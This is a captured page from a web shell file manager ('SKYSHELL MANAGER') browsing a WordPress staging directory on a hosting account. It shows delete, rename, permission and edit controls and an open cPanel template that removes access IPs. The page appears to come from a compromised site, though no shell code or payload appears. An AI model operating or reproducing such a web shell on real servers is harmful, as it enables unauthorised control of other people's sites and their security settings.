📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: delaccessip.html.tt
[% USE Api2; SET CPANEL.CPVAR.dprefix = "../"; SET account_name = CPANEL.FORM.account; SET ip = CPANEL.FORM.ip; SET ip2 = CPANEL.FORM.ip2; SET ip3 = CPANEL.FORM.ip3; SET ip4 = CPANEL.FORM.ip4; SET account_info = Api2.exec( 'SourceIPCheck', 'getaccount', { 'account' => account_name }); SET delip_result = Api2.exec('SourceIPCheck', 'delip', {'ip' => ip, 'ip2' => ip2, 'ip3' => ip3, 'ip4' => ip4, 'account' => account_info.0.account}); SET return_link = 'accessip.html?account=' _ account_info.0.account; %] [% WRAPPER '_assets/master.html.tt' app_key = 'security_policy' %] <div class="body-content"> [%- IF delip_result.0.status == 1 -%] <div class="alert alert-success"> <span class="glyphicon glyphicon-ok-sign"></span> <div class="alert-message" id="delip-success"> [% locale.maketext("The access IP “[_1]” has been removed.", delip_result.0.ip.html()) %] </div> </div> [%- ELSE -%] <div class="alert alert-danger"> <span class="glyphicon glyphicon-remove-sign"></span> <div class="alert-message" id="delip-error"> [% delip_result.0.error.html() %] </div> </div> [%- END -%] [% INCLUDE _assets/return_link.html.tt return_location=return_link return_link_text=locale.maketext('Go Back') %] </div> [% END #wrapper %]
Save